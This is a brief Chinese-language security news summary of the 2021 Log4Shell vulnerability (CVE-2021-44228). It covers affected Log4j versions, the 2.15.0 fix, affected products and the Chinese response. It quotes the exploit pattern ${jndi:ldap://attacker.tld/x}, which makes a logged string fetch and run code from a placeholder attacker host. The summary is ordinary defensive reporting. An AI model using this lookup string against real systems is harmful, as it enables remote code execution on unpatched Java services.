漏洞与应急
Log4Shell 漏洞披露
2021 年 12 月 9 日,Apache Log4j 爆出 Log4Shell 远程代码执行漏洞 (CVE-2021-44228),影响 Log4j 2.0-beta9 至 2.14.1 版本,波及数百万 Java 应用与云服务。CNCERT/CC、CNVD 同步定为高危。
点
点小安2分钟0 次浏览评论本文为事件概要整理。
2021 年 12 月 9 日,阿里云安全团队向 Apache 报告 Log4j 远程代码执行漏洞 (CVE-2021-44228),12 月 10 日 Apache 发布 2.15.0 修复。漏洞因 Log4j 的 JNDI lookup 功能允许通过 ${jndi:ldap://attacker.tld/x} 等模式从远程加载并执行代码,影响 Log4j 2.0-beta9 至 2.14.1。
影响
- 影响 Apache Struts2、Solr、Druid、ElasticSearch 等数百款开源产品
- Steam、Apple iCloud、Minecraft 等被用于演示
- 国内云厂商(阿里云、腾讯云、华为云)紧急部署 WAF 规则
- CNVD、CNNVD 将其定级为高危
国内响应
- CNCERT/CC 发布专项处置指南
- 奇安信、360、安恒等发布本地检测工具
- 国内 Java 生态全面升级
参考资料
转载与版权声明
本文为「点滴安全」基于多方公开资料整理的事件概要,所有原始版权归各发布机构所有。
推荐阅读
更多文章 →原创声明:本文为「点滴安全」原创内容,版权归原作者所有。转载请注明来源「点滴安全」并保留原文链接。免责声明